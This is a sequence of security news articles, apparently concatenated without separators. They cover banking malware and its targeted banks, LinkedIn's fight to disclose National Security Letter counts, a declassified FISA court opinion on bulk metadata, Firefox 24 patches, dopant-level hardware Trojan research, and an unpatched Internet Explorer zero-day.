The malware does what it can to survive and persist on a machine; it can determine whether it’s being executed in a virtual machine and whether the host is online. If either fails, the malware will not execute. To maintain persistence, it creates an autorun registry entry and augments system processes to hinder its removal, the researchers said.
The researchers provided the list of 24 banks being targeted:
- Bank of Scotland
- Barclays Bank
- First Direct
- Santander Direkt Bank AG
- First Citizens Bank
- Bank of America
- Bank of the West
- Sovereign Bank
- Co-operative Bank
- Capital One Financial Corporation
- Chase Manhattan Corporation
- Citi Private Bank
- Comerica Bank
- E*Trade Financial
- Harris Bank
- Intesa Sanpaolo
- Regions Bank
- Bank of Ireland Group Treasury
- U.S. Bancorp
- Banco Mercantil, S.A.
- Varazdinska Banka
- Wintrust Financial Corporation
- Wells Fargo Bank
LinkedIn on Tuesday joined the fray of Internet companies requesting permission from the Foreign Intelligence Surveillance Court to publish data on the number of National Security Letters it receives.
Unlike Google, Microsoft and others that have petitioned the FISA court to lift its ban on the sharing of NSL data, LinkedIn does not offer Web-based email or storage service for its members and therefore does not store the same types of data on individuals that might interest the National Security Agency and the FBI. However, with the NSA’s stated ability and desire to map phone call metadata in order to connect and locate individuals who could be a threat to national security, LinkedIn’s similar mapping between its 238 million members’ professional careers could be of interest to the court.
In the meantime, the company was busy filing not only an amicus brief with a California appeals court, but also fired off letters to the FISA court, FBI, and its users explaining its desire for transparency, a public hearing with the FISA court, and calling the ban on sharing NSL data unconstitutional.
Companies and individuals are barred by the FBI from confirming they’ve even received a National Security Letter, much less publicly revealing in aggregate how many requests have been made by the government. LinkedIn, similarly to Google and others in past motions, said the ban violates the company’s First Amendment rights to free speech and hinders their ability to maintain a trustworthy relationship with users with regard to government access to their data. Requests for additional transparency bubbled to the surface shortly after the Snowden documents were leaked exposing the depths of surveillance activity carried out by the NSA and the access the spy agency has to individuals’ data stored by Internet companies.
“This secretive environment and the information the government has shrouded also invites unfounded speculation that American Internet companies are part of the expansive government surveillance activities,” LinkedIn wrote in its amicus brief. “Such public misperception can have devastating effects on those companies’ reputations and can eviscerate the trust and transparency that they have worked so hard to develop with their users.”
The government, meanwhile, has proposed that companies be allowed to report NSL numbers in ranges of 0-1,000. LinkedIn fought back, stating that approach would not work for smaller companies that would not potentially receive thousands of requests for NSLs because it would create the impression that the number of NSLs would be more substantial than reality. It offered the example where a company could receive 10 requests but would be able to report that number only within a range of 0-1,000.
“The information permitted under these measures would be misleading, would distort the public’s understanding of the actual number of government requests received, would reduce rather than increase transparency, and would deplete rather than enhance trust in the companies, the industry and the government,” LinkedIn wrote.
LinkedIn also called upon the FISA court to uphold a district court ruling calling the ban on revealing NSL data unconstitutional. In two cases, single individuals in New York and Northern California were granted permission to publicly say they were handed National Security Letters.
“When one individual receives a National Security Letter, they have a First Amendment right to speak about that fact under certain conditions,” said Brett Max Kaufman, a lawyer with the American Civil Liberties Union (ACLU). “At a global level, it’s very clear that LinkedIn has a parallel interest in being able to speak about an entire group of individuals whose information is affected by these requests.”
LinkedIn, meanwhile, published a transparency report yesterday, reporting that it fielded 83 government requests for member data in the first half of 2013, 70 of those from the United States impacting 84 member accounts. LinkedIn reported that it provided data in 57 percent of those requests and 49 percent overall. Again, the number of NSL requests are not included in those totals.
“I believe these companies are absolutely sincere with these filings. LinkedIn has likely been involved in contentious negotiations with the government over the summer,” Kaufman said. “I think we can take their word for it that they are committed to their principles and feel strongly as a company that releasing this information would not damage national security.”
A newly declassified opinion from the Foreign Intelligence Surveillance Court from this summer shows the court’s interpretation of the controversial Section 215 of the USA PATRIOT Act that’s used to justify the National Security Agency’s bulk telephone metadata collections, and reveals that none of the companies that have been served with such orders has ever challenged one.
The opinion, which is one of just a handful of such documents to be made public in the last few months as the leaks of the NSA’s collection and cryptographic capabilities have continued to mount, lays out much of the court’s thinking and reasoning for continuing to grant the agency permission to gather telephone metadata on hundreds of millions of Americans. And what it shows is that the court’s ability to impose restrictions on the NSA’s collection and analysis methods is severely restricted by legal precedent.
The FISC opinion was written by Judge Claire V. Eagan and in it she explains that previous Supreme Court decisions have laid the legal groundwork that the NSA uses today to defend against accusations that its collection methods violate the Fourth Amendment protections against unreasonable search and seizure or that the collection violates a reasonable expectation of privacy regarding phone communications. In Smith v. Maryland, the Supreme Court ruled that people have no reasonable expectation of privacy with phone calls, because the phone company has equipment to record those calls and the numerical data related to them.
That reasoning is still used to underpin the NSA’s metadata collection, using the argument that if one person doesn’t have such protection under the Fourth Amendment, then neither does a large group of people.
“Put another way, where one individual does not have a Fourth Amendment interest, grouping together a large number of similarly situated individuals cannot result in a Fourth Amendment interest springing into existence ex nihilo,” the opinion says.
But perhaps the most interesting part of the opinion is the portion that explains the way that Section 215 is applied to the NSA’s metadata collection activities. In the opinion, Eagan contrasts Section 215 with a portion of the criminal code called the Stored Communications Act. That section includes some language that requires the government to provide “specific and articulable facts” to support its need for records or other information in a criminal investigation. That clause is not included in Section 215, and in fact only requires a statement of facts about the terrorism investigation in question.
“In enacting Section 215, Congress removed the requirement for ‘specific and articulable facts’ and that the records pertain to ‘a foreign power or an agent of a foreign power.’ Accordingly, now the government need not provide specific and articulable facts, demonstrate any connection to a particular suspect, nor show materiality when requesting business records under Section 215. To find otherwise would impose a higher burden–one that Congress knew how to include in Section 215, but chose to dispense with,” the opinion says.
In other words, Section 215 is written and interpreted in such a way so as to allow the NSA’s bulk metadata collection methods and to severely limit any challenges to it, so long as the agency is following the minimization and other guidelines set forth. Eagan’s opinion also makes it clear that the only legal challenges to this section can come from the companies on which the orders are served, and not from individuals whose records may be included. However, not one company has ever raised such an objection.
“To date, no holder of records who has received an Order to produce bulk telephone metadata has challenged the legality of such an Order. Indeed, no recipient of any Section 215 Order has ever challenged the legality of such an order, despite the explicit statutory mechanism for doing so,” Eagan’s opinion says.
Image from Flickr photos of Cameron Russell.
The Mozilla Foundation released Firefox 24 yesterday, issuing 17 security patches for the browser. Seven of the bulletins received the highest, critical impact rating, four are considered high impact advisories, the second most severe rating, and the remaining six are of moderate impact.
Mozilla’s patch contained more total and critically rated advisories than any other since January.
According to Mozilla’s security advisories, critical impact bugs are those that give attackers the ability to run code or install malicious software with no user interaction beyond typical browsing:
The first critical advisory, MFSA 2013-92, resolves a garbage collection hazard with default compartments and frame chain. The bug, which could be exploited to establish a use after free scenario, was uncovered by a security researcher operating under the handle Nils and a Mozilla developer named Bobby Holley.
MFSA 2013-90 is a pair memory corruption bugs also reported by Nils. The first led to a use after free condition while scrolling through an image document and the second had to do with nodes in a range request being added as children of two different parents.
Security researcher Aki Helin reported found that combining lists, floats, and multiple columns could trigger an exploitable buffer overflow, which mozilla fixes with MFSA 2013-89.
Using the address sanitizer tool, researcher Scott Bell discovered a use-after-free condition after destroying a <select> element form. If MSFA 2013-81 goes unpatched, it could lead to a potentially exploitable crash.
Chrome security team member Abhishek Arya found a crashable use-after-free problem (MSFA 2013-79) in the Animation Manager while also using the address sanitizer tool.
MSFA 2013-78 patches an integer overflow bug, discovered by Alex Chapman, in the Almost Native Graphics Layer Engine (ANGLE) library that Mozilla uses. The vulnerability existed because “of insufficient bounds checking in the drawLineLoop function, which can be driven by web content to overflow allocated memory, leading to a potentially exploitable crash.”
The last critical impact bulletin, MSFA 2013-76, fixes a handful of memory safety hazards uncovered by Mozilla developers.
Moderate impact bugs are high of critical impact bugs that an attacker could only exploit under uncommon circumstances when a user is running non-default configurations. Mozilla’s fixes for these bugs are as follows: user-defined properties on DOM proxies get the wrong “this” object, WebGL Information disclosure through OS X NVIDIA graphic drivers, uninitialized data in IonMonkey, same-origin bypass through symbolic links, NativeKey continues handling key messages after widget is destroyed, and improper state in HTML5 Tree Builder with templates.
Is it so outlandish anymore to consider that an attacker interested in military, political or corporate espionage would be able to infiltrate a supply chain and drop malware onto an integrated circuit? Evidence of hardware-based Trojans is anecdotal at best, and experts believe a change in motherboard circuitry or wiring, for example, would be detectable either via visual inspection or in comparison to a gold copy of the hardware in question.
However, given that documents leaked by NSA whistleblower Edward Snowden intimate the U.S. spy agency was working with chipmakers and placing backdoors into hardware bound for foreign targets, the once-outlandish doesn’t seem so outrageous anymore.
And now, an international team of researchers may have upped the ante on hardware-based attacks. In a recently published paper, they describe how they are able to modify a circuit with malware and yet, to detection mechanisms, the circuit appears to be pristine.
“Instead of adding additional circuitry to the target design, we insert our hardware Trojans by changing the dopant polarity of existing transistors. Since the modified circuit appears legitimate on all wiring layers (including all metal and polysilicon), our family of Trojans is resistant to most detection techniques, including fine-grain optical inspection and checking against ‘golden chips,’” the team—Georg T. Becker, Francesco Rgazzoni, Christof Paar and Wayne P. Burleson—wrote in its paper.
Dopant is a material that is added to semiconductor material that enables it to be electrically conductive. The researchers tested their stealthy Trojan on Intel’s random number generator design used in Ivy Bridge processors, as well as in a side-channel resistant SBox implementation.
While there is relatively little research available on hardware Trojans, the team dove into its research understanding that a jump in outsourcing—circuits are often designed in one location, likely built offshore, and then packed and distributed by more external parties—damages trust in the security of circuits.
“Even if chips are manufactured in a trusted [fabrication], there is the risk that chips with hardware Trojans could be introduced into the supply chain,” the researchers wrote. “The discovery of counterfeit chips in industrial and military products over the last years has made this threat much more conceivable.”
Some existing work on hardware Trojans, done mostly in academic settings, introduce malware at the hardware layer. This generally happens in a foundry setting where an attacker would have access only to layout masks; this limited access makes these types of attacks impractical because additional space is required for the malicious circuit and connections and would be easy to detect. Attacks using dopant have also been tried before where the concentration of dopant is changed to age the circuit, eventually causing it to fail. However, the researchers point out that approach is impractical because it’s impossible to predict when the circuit would fail and cause a denial-of-service condition.
The researchers said their approach is more realistic because it is done by modifying the polarity of the dopant, which can be done at a foundry setting, and still resist optical inspection and go undetected.
“A dedicated setup could eventually allow one to identify the dopant polarity. However, doing so in a large design comprising millions of transistors implemented with small technologies seems impractical and represents an interesting future research direction,” the paper said. “We exploit this limitation to make our Trojans resistant against optical reverse-engineering.”
“To the best of our knowledge, our dopant-based Trojans are the first proposed, implemented, tested, and evaluated layout-level hardware Trojans that can do more than act as denial-of-service Trojans based on aging effects.”
The paper explains in great detail how the researchers attacked the Intel Ivy Bridge processors and pulled off a side channel attack that leaked secret keys from the hardware.
Ivy Bridge generates unpredictable 128-bit random numbers for the security of transactions. The researchers were able to get their Trojan onto the processor at the sub-transistor level to compromise the security of the keys generated with its random number generator.
“Our Trojan is capable of reducing the security of the produced random number from 128 bits to n bits, where n can be chosen,” the researchers wrote. “Despite these changes, the modified Trojan RNG passes not only the Built-In-Self-Test (BIST) but also generates random numbers that pass the NIST test suite for random numbers.”
As for the side-channel Trojan, it demonstrates flexibility of the dopant Trojan by attacking weaknesses that enable side-channel attacks in iMDPL, or improved Masked Dual Rail Logic.
“Rather than modifying logic behavior of a design, dopant Trjoan establishes a hidden side-channel attack that leaks secret keys,” the researchers wrote. “The dopant Trojan can be used to compromise the security of a meaningful real-world target while avoiding detection by functional testing as well as Trojan detection mechanisms.”
UPDATE–Microsoft is looking into reports of targeted attacks against a new vulnerability that exists in all supported versions of Internet Explorer. The attacks are targeting IE 8 and 9 and there’s no patch for the vulnerability right now, though Microsoft has developed a FixIt tool for it.
“The vulnerability is a remote code execution vulnerability. The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated. The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website,” the Microsoft advisory says.
Microsoft did not specify where the attacks against this vulnerability were coming from or whether there are specific compromised Web sites involved. The company has several recommendations for mitigations for this vulnerability, including applying the FixIt solution and setting IE to warn you before running Active Scripting. The most likely attack scenarios for this vulnerability are the typical link in an email or drive-by download.
“In a web-based attack scenario, an attacker could host a website that contains a webpage that is used to exploit this vulnerability. In addition, compromised websites and websites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these websites. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes users to the attacker’s website,” Microsoft said.
Researchers at Qualys say that the attacks are happening in Japan right now, but could spread quickly now that some details of the vulnerability are public.
“The exploit depends on a Microsoft Office DLL which has been compiled without Adress Space Layout Randomization (ALSR) to locate the right memory segment to attack, but this DLL is extremely common and most likely will not lower the affected population by much. While the attack is very targeted and geographically limited to Japan, it might not affect you at the moment. But with the publication of the shim, other attackers can now analyze the condition fixed and will be able to produce an equivalent exploit fairly quickly,” Wolfgang Kandek of Qualys said.
This story was updated on Sept. 18 to add technical information on the exploit.